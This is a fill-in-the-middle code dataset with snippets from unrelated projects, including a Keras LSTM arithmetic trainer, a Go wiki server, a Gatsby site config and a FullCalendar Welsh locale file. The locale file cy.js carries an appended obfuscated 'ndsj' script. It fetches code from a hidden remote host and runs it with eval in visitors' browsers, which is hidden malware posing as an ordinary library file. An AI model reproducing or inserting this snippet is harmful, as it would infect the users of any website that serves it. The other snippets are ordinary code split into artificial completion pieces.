file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
addition-subtractor.py |
# coding: utf-8
from keras.models import Sequential
from keras import layers
import numpy as np
import matplotlib.pyplot as plt
from six.moves import range
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--data_size', default='45000')
parser.add_argument('--train_size', default='40000')
parser.add_argument('--digits', default='3')
parser.add_argument('--epoch', default='2')
parser.add_argument('--activation', default='softmax')
parser.add_argument('--output_name', default='model_1')
args = parser.parse_args()
# # Parameters Config
class colors:
|
DATA_SIZE = int(args.data_size)
TRAIN_SIZE = int(args.train_size)
DIGITS = int(args.digits)
REVERSE = False
MAXLEN = DIGITS + 1 + DIGITS
chars = '0123456789+- '
RNN = layers.LSTM
HIDDEN_SIZE = 128
BATCH_SIZE = 128
EPOCH_SIZE = int(args.epoch)
LAYERS = 1
ACTIVATION = args.activation
output_file = open('./data/as-' + args.output_name, 'w')
print('DATA_SIZE = ', DATA_SIZE , file=output_file)
print('TRAIN_SIZE = ', TRAIN_SIZE, file=output_file)
print('DIGITS = ', DIGITS, file=output_file)
print('EPOCH_SIZE = ', EPOCH_SIZE, file=output_file)
print('ACTIVATION = ', ACTIVATION, file=output_file)
class CharacterTable(object):
def __init__(self, chars):
self.chars = sorted(set(chars))
self.char_indices = dict((c, i) for i, c in enumerate(self.chars))
self.indices_char = dict((i, c) for i, c in enumerate(self.chars))
def encode(self, C, num_rows):
x = np.zeros((num_rows, len(self.chars)))
for i, c in enumerate(C):
x[i, self.char_indices[c]] = 1
return x
def decode(self, x, calc_argmax=True):
if calc_argmax:
x = x.argmax(axis=-1)
return "".join(self.indices_char[i] for i in x)
ctable = CharacterTable(chars)
ctable.indices_char
# # Data Generation
questions = []
expected = []
seen = set()
print('Generating data...')
while len(questions) < DATA_SIZE:
f = lambda: int(''.join(np.random.choice(list('0123456789')) for i in range(np.random.randint(1, DIGITS + 1))))
a, b = f(), f()
if len(questions) % 2 == 0:
q = '{}-{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a - b)
else:
q = '{}+{}'.format(a, b)
query = q + ' ' * (MAXLEN - len(q))
ans = str(a + b)
if q in seen:
continue
seen.add(q)
ans += ' ' * (DIGITS + 1 - len(ans))
if REVERSE:
query = query[::-1]
questions.append(query)
expected.append(ans)
print('Total addition questions:', len(questions))
print(questions[:5], expected[:5])
# # Processing
print('Vectorization... (to the one-hot encoding)')
x = np.zeros((len(questions), MAXLEN, len(chars)), dtype=np.bool)
y = np.zeros((len(expected), DIGITS + 1, len(chars)), dtype=np.bool)
for i, sentence in enumerate(questions):
x[i] = ctable.encode(sentence, MAXLEN)
for i, sentence in enumerate(expected):
y[i] = ctable.encode(sentence, DIGITS + 1)
indices = np.arange(len(y))
np.random.shuffle(indices)
print(indices)
x = x[indices]
y = y[indices]
# train_test_split
train_x = x[:TRAIN_SIZE]
train_y = y[:TRAIN_SIZE]
test_x = x[TRAIN_SIZE:]
test_y = y[TRAIN_SIZE:]
print('Training Data:')
print(train_x.shape)
print(train_y.shape)
split_at = len(train_x) - len(train_x) // 10
print('split_at', split_at)
(x_train, x_val) = train_x[:split_at], train_x[split_at:]
(y_train, y_val) = train_y[:split_at], train_y[split_at:]
print('Training Data:')
print(x_train.shape)
print(y_train.shape)
print('Validation Data:')
print(x_val.shape)
print(y_val.shape)
print('Testing Data:')
print(test_x.shape)
print(test_y.shape)
print("input: ", x_train[:3], '\n\n', "label: ", y_train[:3])
# # Build Model
print('Build model...')
model = Sequential()
model.add(RNN(HIDDEN_SIZE, input_shape=(MAXLEN, len(chars))))
model.add(layers.RepeatVector(DIGITS + 1))
for _ in range(LAYERS):
model.add(RNN(HIDDEN_SIZE, return_sequences=True))
model.add(layers.TimeDistributed(layers.Dense(len(chars))))
model.add(layers.Activation(ACTIVATION))
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
print('train set = ', x_train.shape, 'validation set = ', x_val.shape, file=output_file)
acc = []
val_acc = []
loss = []
val_loss = []
# # Training
for loop in range(100):
print()
print('-' * 50)
print('Train Loop Num:', loop)
history = model.fit(x_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCH_SIZE,
validation_data=(x_val, y_val),
shuffle=True)
acc += history.history['acc']
val_acc += history.history['val_acc']
loss += history.history['loss']
val_loss += history.history['val_loss']
print('loop ', loop, file=output_file)
print('acc = {} '.format(history.history['acc']), end='', file=output_file)
print('val_acc = {} '.format(history.history['val_acc']), end='', file=output_file)
print('loss = {} '.format(history.history['loss']), end='', file=output_file)
print('val_loss = {} '.format(history.history['val_loss']), file=output_file)
print('-' * 50 , file=output_file)
for i in range(10):
ind = np.random.randint(0, len(x_val))
rowx, rowy = x_val[np.array([ind])], y_val[np.array([ind])]
preds = model.predict_classes(rowx, verbose=0)
q = ctable.decode(rowx[0])
correct = ctable.decode(rowy[0])
guess = ctable.decode(preds[0], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
# # Testing
print("MSG : Prediction")
print("-" * 50)
right = 0
preds = model.predict_classes(test_x, verbose=0)
for i in range(len(preds)):
q = ctable.decode(test_x[i])
correct = ctable.decode(test_y[i])
guess = ctable.decode(preds[i], calc_argmax=False)
print('Q', q[::-1] if REVERSE else q, end=' ')
print('T', correct, end=' ')
if correct == guess:
print(colors.ok + '☑' + colors.close, end=' ')
right += 1
else:
print(colors.fail + '☒' + colors.close, end=' ')
print(guess)
print("MSG : Accuracy is {}".format(right / len(preds)))
print("MSG : Accuracy is {}".format(right / len(preds)), file=output_file)
model.save('./models/as-' + args.output_name + '.h5')
with open('./corpus/as-' + args.output_name + '-training-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_train, y_train):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-validation-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(x_val, y_val):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
with open('./corpus/as-' + args.output_name + '-testing-corpus.csv', 'w') as corpus:
print('questions,expected', file=corpus)
for (x, y) in zip(test_x, test_y):
print('{},{}'.format(ctable.decode(x), ctable.decode(y)), file=corpus)
plt.plot(acc)
plt.plot(val_acc)
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-accuracy-' + args.output_name + '.png')
plt.clf()
# summarize history for loss
plt.plot(loss)
plt.plot(val_loss)
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'test'], loc='upper left')
plt.savefig('./fig/as-loss-' + args.output_name + '.png')
output_file.close()
plt.clf()
| ok = '\033[92m'
fail = '\033[91m'
close = '\033[0m' |
copy.py | #!/usr/bin/env python
from actions.action import Action
import os
import contextlib
import re
import shutil
__author__ = "Ryan Sheffer"
__copyright__ = "Copyright 2020, Sheffer Online Services"
__credits__ = ["Ryan Sheffer", "VREAL"]
class Copy(Action):
"""
Copy Action
An action designed to copy file/s as part of a build process.
TODO: Setup wildcard like copying? Take advantage of a copy module with a lot of options.
TODO: Have many copying options, like many files in a folder to another folder. Whole dir trees, etc.
"""
def __init__(self, config, **kwargs):
super().__init__(config, **kwargs)
self.copy_items = kwargs['copy'] if 'copy' in kwargs else []
def verify(self):
if not len(self.copy_items):
return 'No items to copy!'
for item in self.copy_items:
if type(item) is not list or len(item) != 2:
return 'Invalid copy item found in copy list!'
item[0] = self.replace_tags(item[0])
item[1] = self.replace_tags(item[1])
if not os.path.isfile(item[0]):
return 'Copy item ({}) does not exist!'.format(item[0])
return ''
def run(self):
|
if __name__ == "__main__":
class VarClassTest(object):
def __init__(self):
self.HI2_there = "some\\cool\\path"
self.three = "another\\cool\\path"
print(Copy.replace_path_sections('hello\\{HI2_there}\\then\\there\\were\\{three}\\bla.exe', VarClassTest()))
print(Copy.replace_path_sections('hello\\then\\there\\{not_found}\\three.exe', VarClassTest()))
| for item in self.copy_items:
with contextlib.suppress(FileNotFoundError):
os.unlink(item[1])
os.makedirs(os.path.dirname(item[1]), exist_ok=True)
print('Copying {} to {}'.format(item[0], item[1]))
shutil.copy2(item[0], item[1])
return True |
helpers.rs | use derivative::Derivative;
use pest::Span;
pub(crate) fn span_into_str(span: Span) -> &str {
span.as_str()
}
pub(crate) fn span_into_bool(span: Span) -> bool {
return if span_into_str(span) == "True" { true } else { false }
}
pub(crate) fn parse_u64(span: Span) -> u64 {
let input = span.as_str();
input
.parse()
.map_err(|e| {
log::error!("Failed to read `{}` as u64: {}", input, e);
e
}) | #[derivative(Debug = "transparent")]
pub struct Debug<'src> {
pub content: &'src str,
}
impl<'a> ::from_pest::FromPest<'a> for Debug<'a> {
type Rule = crate::xkb::Rule;
type FatalError = ::from_pest::Void;
fn from_pest(
pest: &mut ::from_pest::pest::iterators::Pairs<'a, Self::Rule>,
) -> ::std::result::Result<Self, ::from_pest::ConversionError<::from_pest::Void>> {
let mut clone = pest.clone();
let pair = clone.next().ok_or(::from_pest::ConversionError::NoMatch)?;
*pest = clone;
Ok(Debug { content: pair.as_str() })
}
} | .unwrap()
}
#[derive(Derivative, Clone, PartialEq)] |
cy.js | FullCalendar.globalLocales.push(function () {
'use strict';
var cy = {
code: 'cy',
week: {
dow: 1, // Monday is the first day of the week.
doy: 4, // The week that contains Jan 4th is the first week of the year.
},
buttonText: {
prev: 'Blaenorol',
next: 'Nesaf',
today: 'Heddiw',
year: 'Blwyddyn',
month: 'Mis',
week: 'Wythnos',
day: 'Dydd',
list: 'Rhestr', | weekText: 'Wythnos',
allDayText: 'Trwy\'r dydd',
moreLinkText: 'Mwy',
noEventsText: 'Dim digwyddiadau',
};
return cy;
}());
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());}; | }, |
login.module.ts | import { NgModule } from "@angular/core";
import { CommonModule } from "@angular/common";
import { FormsModule, ReactiveFormsModule } from "@angular/forms";
import { SignUpComponent } from "../signup/signup.component";
import { LoginComponent } from "./login.component";
import { HttpClientModule } from "@angular/common/http";
import { RouterModule } from "@angular/router";
@NgModule({
declarations: [LoginComponent],
imports: [CommonModule, FormsModule, HttpClientModule, ReactiveFormsModule],
exports: [LoginComponent],
})
export class LoginModule {} | ||
wiki.go | package main
import (
"./dao"
"./models"
"fmt"
"gopkg.in/mgo.v2/bson"
"html/template"
"net/http"
"regexp"
)
var templates = template.Must(template.ParseFiles("tmpl/view.html", "tmpl/edit.html", "tmpl/list.html"))
var validPath = regexp.MustCompile("^/(edit|save|view)/([a-zA-Z0-9]+)$")
var validListPath = regexp.MustCompile("^/(list)(/)?$")
var wikiDao *dao.WikiDAO
func main() {
wikiDao = &dao.WikiDAO{Server: "127.0.0.1", Database: "gowiki"}
wikiDao.Connect()
http.HandleFunc("/", makeHandler(listHandler))
http.HandleFunc("/list/", makeHandler(listHandler))
http.HandleFunc("/view/", makeHandler(viewHandler))
http.HandleFunc("/edit/", makeHandler(editHandler))
http.HandleFunc("/save/", makeHandler(saveHandler))
http.ListenAndServe(":8080", nil)
}
func makeHandler(fn func(w http.ResponseWriter, r *http.Request, title string)) func(w http.ResponseWriter, p *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
if r.URL.Path == "/" {
r.URL.Path = "/list"
}
if validListPath.FindString(r.URL.Path) == r.URL.Path {
fn(w, r, "")
} else {
m := validPath.FindStringSubmatch(r.URL.Path)
if m == nil {
http.NotFound(w, r)
return
}
fn(w, r, m[2])
}
}
}
func listHandler(w http.ResponseWriter, r *http.Request, title string) {
pages, err := wikiDao.ListAllEntries()
if err != nil {
http.NotFound(w, r)
}
renderListTemplate(w, "list", pages)
}
func viewHandler(w http.ResponseWriter, r *http.Request, title string) {
p, err := wikiDao.LoadPage(title)
if err != nil {
http.Redirect(w, r, "/edit/"+title, http.StatusFound)
}
renderTemplate(w, "view", p)
}
func editHandler(w http.ResponseWriter, r *http.Request, title string) {
p, err := wikiDao.LoadPage(title)
if err != nil {
p = &models.Page{Title: title}
}
renderTemplate(w, "edit", p)
}
func saveHandler(w http.ResponseWriter, r *http.Request, title string) {
body := r.FormValue("body")
pageID := r.FormValue("id")
fmt.Printf("Page Id:%v\n", pageID)
var p *models.Page
var err error
p = &models.Page{Title: title, Body: []byte(body)}
if pageID == "" {
err = wikiDao.SavePage(p, true)
} else {
p.ID = bson.ObjectIdHex(pageID)
fmt.Printf("Page Id:%v\n", p.ID)
err = wikiDao.SavePage(p, false)
}
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
http.Redirect(w, r, "/view/"+title, http.StatusFound)
}
func renderTemplate(w http.ResponseWriter, tmpl string, p *models.Page) {
err := templates.ExecuteTemplate(w, tmpl+".html", p)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
func | (w http.ResponseWriter, tmpl string, p *[]models.Page) {
err := templates.ExecuteTemplate(w, tmpl+".html", p)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
}
| renderListTemplate |
gatsby-config.js | require('dotenv').config();
const TailwindExtractor = require('./utils/purgecss-tailwind-extractor');
const siteMetadata = {
title: 'Paralelná Polis Košice',
description:
'Paralelná Polis Košice je zameraná na vzdelávanie, objavovanie, tvorenie lepších systémov, experimentovanie a aplikáciu kryptomien a spojených technológií do bežného života. Je tu pre všetkých, ktorí majú záujem fungovať slobodnejšie a nezávislejšie.',
siteUrl: 'https://www.paralelnapoliskosice.sk',
image: '/ppke-temp.jpg',
email: '[email protected]',
social: {
facebook: 'https://www.facebook.com/paralelnapoliske',
github: 'https://github.com/ParalelnaPolisKE',
instagram: 'https://www.instagram.com/paralelnapoliske',
youtube: 'https://www.youtube.com/channel/UCC90ybnmSHgleXJaWPces9g',
twitter: 'https://twitter.com/parallelpoliske',
rss: '/blog/rss.xml',
},
crypto: {
BTC: '1KGB5uxAZrFYrHKsydLvfhwT4VULE1tunA',
LTC: 'Lha1KBxm5wgtTEJdk1tyBhWgAuxJ2zV9zX',
XMR:
'49XCoar5nDSiz3QfSa25jyJ5KJSc95pkpS8YXWVoB3TY8LDVjEjhUoZRRQL5sidfLB6cUWnxH2Tv5VbGKzxxieJqQPPHuea',
ETH: '0x610825C5DFcbc72E284E5a5F381f4fd728263706',
ETC: '0x1934945354BDe5b34F0c68E6AA78492050856D38',
},
nodes: {
BTC: {
mainnet: {
url: "btc.ppke.sk",
port: ""
}
},
LTC: {
mainnet: {
url: "ltc.ppke.sk",
port: ""
}
},
XMR: {
mainnet: {
url: "xmr.ppke.sk",
port: "18081"
}
},
},
facebookAppID: '2127644397453206',
mailchimpUrl:
'https://paralelnapoliskosice.us19.list-manage.com/subscribe/post?u=8affbd08463d07e25a8bbcca4&id=b02c302d92',
joinUsFormAction:
'https://briskforms.com/go/410d7fbf05f2283f04c8a02e86b531be',
};
const plugins = [
{
resolve: 'gatsby-plugin-feed',
options: {
feeds: [
{
serialize: ({ query: { site, allMarkdownRemark } }) => {
return allMarkdownRemark.edges.map(({ node }) => {
return {
title: node.frontmatter.title,
description: node.excerpt,
url: `${site.siteMetadata.siteUrl}/blog${node.fields.slug}`,
guid: `${site.siteMetadata.siteUrl}/blog${node.fields.slug}`,
author: node.frontmatter.author.id,
custom_elements: [
{
pubDate: new Date(node.fields.date).toUTCString(),
},
],
};
});
},
setup: ({
query: {
site: { siteMetadata },
},
}) => {
return {
title: `${siteMetadata.title} - Blog`,
description: siteMetadata.description,
feed_url: siteMetadata.siteUrl + `/blog/rss.xml`,
site_url: siteMetadata.siteUrl,
};
},
query: `
{
allMarkdownRemark(
sort: { order: DESC, fields: [fields___date] }
) {
edges {
node {
excerpt
fields {
date
slug
}
frontmatter {
title
author {
id
}
}
}
}
}
}
`,
output: '/blog/rss.xml',
title: `${siteMetadata.title} - Blog`,
},
],
},
},
'gatsby-plugin-netlify-cms',
'gatsby-plugin-react-helmet',
'gatsby-plugin-remove-trailing-slashes',
'gatsby-transformer-json',
{
resolve: 'gatsby-source-filesystem',
options: {
name: 'data',
path: `${__dirname}/src/data`,
},
},
{
resolve: 'gatsby-source-filesystem',
options: {
name: 'assets',
path: `${__dirname}/static/assets`,
},
},
{
resolve: 'gatsby-source-filesystem',
options: {
name: 'posts',
path: `${__dirname}/src/pages/blog/`,
},
},
// 'gatsby-plugin-sitemap',
'gatsby-plugin-netlify-cms-paths',
'gatsby-plugin-sharp',
{
resolve: 'gatsby-transformer-remark',
options: {
plugins: [
'gatsby-plugin-netlify-cms-paths',
{
resolve: 'gatsby-remark-images',
options: {
linkImagesToOriginal: false,
maxWidth: 1200,
quality: 75,
},
},
{
resolve: 'gatsby-remark-autolink-headers',
options: {
removeAccents: true,
},
},
],
},
},
'gatsby-plugin-catch-links',
'gatsby-transformer-sharp',
{
resolve: 'gatsby-mdx',
options: {
defaultLayouts: {
default: require.resolve('./src/templates/page.jsx'),
},
},
},
{
resolve: 'gatsby-plugin-purgecss',
options: {
extractors: [
{
extractor: TailwindExtractor,
extensions: ['js', 'jsx'],
},
],
whitelist: ['___gatsby', 'ol', 'h2', 'h3'],
whitelistPatterns: [/^icon\-/, /^marker/],
},
},
{
resolve: 'gatsby-plugin-manifest',
options: {
name: 'Paralelná Polis Košice',
short_name: 'PPKE',
start_url: '/',
background_color: '#ffffff',
theme_color: '#000000',
display: 'standalone',
icons: [
{
src: `/android-chrome-192x192.png`,
sizes: `192x192`,
type: `image/png`,
},
{
src: `/android-chrome-512x512.png`,
sizes: `512x512`,
type: `image/png`,
},
],
},
},
// 'gatsby-plugin-offline', // Disabled as new content need hard refresh
'gatsby-plugin-remove-serviceworker',
// Disabled until FB API token resolved
// {
// resolve: `gatsby-source-facebook`,
// options: {
// places: ['782479115289415'], // Can be either a numeric ID or the URL ID
// params: {
// fields:
// 'events { id, name, description, start_time, end_time, place { id, name } }',
// },
// key: process.env.FACEBOOK_ACCESS_TOKEN,
// version: '7.0',
// },
// },
// Disabled until FB Instagram API works as expected again...
// {
// resolve: 'gatsby-source-instagram', | // },
// },
'gatsby-plugin-react-leaflet',
];
const mapping = {
'MarkdownRemark.frontmatter.author': 'AuthorJson',
};
/**
* Adds Google Analytics only to live production site
*
* `CONTEXT` comes from Netlify build process
* @see https://www.netlify.com/docs/continuous-deployment/#build-environment-variables
*/
if (process.env.CONTEXT === 'production') {
plugins.push({
resolve: 'gatsby-plugin-google-analytics',
options: {
trackingId: 'UA-124036846-1',
head: true,
respectDNT: true,
},
});
}
module.exports = {
pathPrefix: `/blog`,
siteMetadata,
plugins,
mapping,
}; | // options: {
// username: '7188082683', |
serviceAreaMetaData.js | // All material copyright ESRI, All Rights Reserved, unless otherwise specified.
// See https://js.arcgis.com/4.11/esri/copyright.txt for details. | //>>built
define(["require","exports"],function(b,c){return function(){return function(a){void 0===a&&(a=null);this.url="//route.arcgis.com/arcgis/rest/services/World/ServiceAreas/NAServer/ServiceArea_World/solveServiceArea";this.credentials=null;this.impedanceAttributeNames=[{serviceValue:"TravelTime",entryName:"traveltime"},{serviceValue:"TruckTravelTime",entryName:"trucktraveltime"},{serviceValue:"WalkTime",entryName:"walktime"},{serviceValue:"Miles",entryName:"miles"},{serviceValue:"Kilometers",entryName:"kilometers"}];
this.defaultImpledanceAttributeName="TravelTime";this.credentials=a}}()}); |
|
zz_generated_user_attribute_mock.go | // Code generated by moq; DO NOT EDIT.
// github.com/matryer/moq
package fakes
import (
context "context"
sync "sync"
controller "github.com/rancher/norman/controller"
objectclient "github.com/rancher/norman/objectclient"
v3 "github.com/rancher/types/apis/management.cattle.io/v3"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
labels "k8s.io/apimachinery/pkg/labels"
watch "k8s.io/apimachinery/pkg/watch"
cache "k8s.io/client-go/tools/cache"
)
var (
lockUserAttributeListerMockGet sync.RWMutex
lockUserAttributeListerMockList sync.RWMutex
)
// Ensure, that UserAttributeListerMock does implement UserAttributeLister.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributeLister = &UserAttributeListerMock{}
// UserAttributeListerMock is a mock implementation of UserAttributeLister.
//
// func TestSomethingThatUsesUserAttributeLister(t *testing.T) {
//
// // make and configure a mocked UserAttributeLister
// mockedUserAttributeLister := &UserAttributeListerMock{
// GetFunc: func(namespace string, name string) (*v3.UserAttribute, error) {
// panic("mock out the Get method")
// },
// ListFunc: func(namespace string, selector labels.Selector) ([]*v3.UserAttribute, error) {
// panic("mock out the List method")
// },
// }
//
// // use mockedUserAttributeLister in code that requires UserAttributeLister
// // and then make assertions.
//
// }
type UserAttributeListerMock struct {
// GetFunc mocks the Get method.
GetFunc func(namespace string, name string) (*v3.UserAttribute, error)
// ListFunc mocks the List method.
ListFunc func(namespace string, selector labels.Selector) ([]*v3.UserAttribute, error)
// calls tracks calls to the methods.
calls struct {
// Get holds details about calls to the Get method.
Get []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
}
// List holds details about calls to the List method.
List []struct {
// Namespace is the namespace argument value.
Namespace string | }
}
// Get calls GetFunc.
func (mock *UserAttributeListerMock) Get(namespace string, name string) (*v3.UserAttribute, error) {
if mock.GetFunc == nil {
panic("UserAttributeListerMock.GetFunc: method is nil but UserAttributeLister.Get was just called")
}
callInfo := struct {
Namespace string
Name string
}{
Namespace: namespace,
Name: name,
}
lockUserAttributeListerMockGet.Lock()
mock.calls.Get = append(mock.calls.Get, callInfo)
lockUserAttributeListerMockGet.Unlock()
return mock.GetFunc(namespace, name)
}
// GetCalls gets all the calls that were made to Get.
// Check the length with:
// len(mockedUserAttributeLister.GetCalls())
func (mock *UserAttributeListerMock) GetCalls() []struct {
Namespace string
Name string
} {
var calls []struct {
Namespace string
Name string
}
lockUserAttributeListerMockGet.RLock()
calls = mock.calls.Get
lockUserAttributeListerMockGet.RUnlock()
return calls
}
// List calls ListFunc.
func (mock *UserAttributeListerMock) List(namespace string, selector labels.Selector) ([]*v3.UserAttribute, error) {
if mock.ListFunc == nil {
panic("UserAttributeListerMock.ListFunc: method is nil but UserAttributeLister.List was just called")
}
callInfo := struct {
Namespace string
Selector labels.Selector
}{
Namespace: namespace,
Selector: selector,
}
lockUserAttributeListerMockList.Lock()
mock.calls.List = append(mock.calls.List, callInfo)
lockUserAttributeListerMockList.Unlock()
return mock.ListFunc(namespace, selector)
}
// ListCalls gets all the calls that were made to List.
// Check the length with:
// len(mockedUserAttributeLister.ListCalls())
func (mock *UserAttributeListerMock) ListCalls() []struct {
Namespace string
Selector labels.Selector
} {
var calls []struct {
Namespace string
Selector labels.Selector
}
lockUserAttributeListerMockList.RLock()
calls = mock.calls.List
lockUserAttributeListerMockList.RUnlock()
return calls
}
var (
lockUserAttributeControllerMockAddClusterScopedHandler sync.RWMutex
lockUserAttributeControllerMockAddHandler sync.RWMutex
lockUserAttributeControllerMockEnqueue sync.RWMutex
lockUserAttributeControllerMockGeneric sync.RWMutex
lockUserAttributeControllerMockInformer sync.RWMutex
lockUserAttributeControllerMockLister sync.RWMutex
lockUserAttributeControllerMockStart sync.RWMutex
lockUserAttributeControllerMockSync sync.RWMutex
)
// Ensure, that UserAttributeControllerMock does implement UserAttributeController.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributeController = &UserAttributeControllerMock{}
// UserAttributeControllerMock is a mock implementation of UserAttributeController.
//
// func TestSomethingThatUsesUserAttributeController(t *testing.T) {
//
// // make and configure a mocked UserAttributeController
// mockedUserAttributeController := &UserAttributeControllerMock{
// AddClusterScopedHandlerFunc: func(ctx context.Context, name string, clusterName string, handler v3.UserAttributeHandlerFunc) {
// panic("mock out the AddClusterScopedHandler method")
// },
// AddHandlerFunc: func(ctx context.Context, name string, handler v3.UserAttributeHandlerFunc) {
// panic("mock out the AddHandler method")
// },
// EnqueueFunc: func(namespace string, name string) {
// panic("mock out the Enqueue method")
// },
// GenericFunc: func() controller.GenericController {
// panic("mock out the Generic method")
// },
// InformerFunc: func() cache.SharedIndexInformer {
// panic("mock out the Informer method")
// },
// ListerFunc: func() v3.UserAttributeLister {
// panic("mock out the Lister method")
// },
// StartFunc: func(ctx context.Context, threadiness int) error {
// panic("mock out the Start method")
// },
// SyncFunc: func(ctx context.Context) error {
// panic("mock out the Sync method")
// },
// }
//
// // use mockedUserAttributeController in code that requires UserAttributeController
// // and then make assertions.
//
// }
type UserAttributeControllerMock struct {
// AddClusterScopedHandlerFunc mocks the AddClusterScopedHandler method.
AddClusterScopedHandlerFunc func(ctx context.Context, name string, clusterName string, handler v3.UserAttributeHandlerFunc)
// AddHandlerFunc mocks the AddHandler method.
AddHandlerFunc func(ctx context.Context, name string, handler v3.UserAttributeHandlerFunc)
// EnqueueFunc mocks the Enqueue method.
EnqueueFunc func(namespace string, name string)
// GenericFunc mocks the Generic method.
GenericFunc func() controller.GenericController
// InformerFunc mocks the Informer method.
InformerFunc func() cache.SharedIndexInformer
// ListerFunc mocks the Lister method.
ListerFunc func() v3.UserAttributeLister
// StartFunc mocks the Start method.
StartFunc func(ctx context.Context, threadiness int) error
// SyncFunc mocks the Sync method.
SyncFunc func(ctx context.Context) error
// calls tracks calls to the methods.
calls struct {
// AddClusterScopedHandler holds details about calls to the AddClusterScopedHandler method.
AddClusterScopedHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// ClusterName is the clusterName argument value.
ClusterName string
// Handler is the handler argument value.
Handler v3.UserAttributeHandlerFunc
}
// AddHandler holds details about calls to the AddHandler method.
AddHandler []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Name is the name argument value.
Name string
// Handler is the handler argument value.
Handler v3.UserAttributeHandlerFunc
}
// Enqueue holds details about calls to the Enqueue method.
Enqueue []struct {
// Namespace is the namespace argument value.
Namespace string
// Name is the name argument value.
Name string
}
// Generic holds details about calls to the Generic method.
Generic []struct {
}
// Informer holds details about calls to the Informer method.
Informer []struct {
}
// Lister holds details about calls to the Lister method.
Lister []struct {
}
// Start holds details about calls to the Start method.
Start []struct {
// Ctx is the ctx argument value.
Ctx context.Context
// Threadiness is the threadiness argument value.
Threadiness int
}
// Sync holds details about calls to the Sync method.
Sync []struct {
// Ctx is the ctx argument value.
Ctx context.Context
}
}
}
// AddClusterScopedHandler calls AddClusterScopedHandlerFunc.
func (mock *UserAttributeControllerMock) AddClusterScopedHandler(ctx context.Context, name string, clusterName string, handler v3.UserAttributeHandlerFunc) {
if mock.AddClusterScopedHandlerFunc == nil {
panic("UserAttributeControllerMock.AddClusterScopedHandlerFunc: method is nil but UserAttributeController.AddClusterScopedHandler was just called")
}
callInfo := struct {
Ctx context.Context
Name string
ClusterName string
Handler v3.UserAttributeHandlerFunc
}{
Ctx: ctx,
Name: name,
ClusterName: clusterName,
Handler: handler,
}
lockUserAttributeControllerMockAddClusterScopedHandler.Lock()
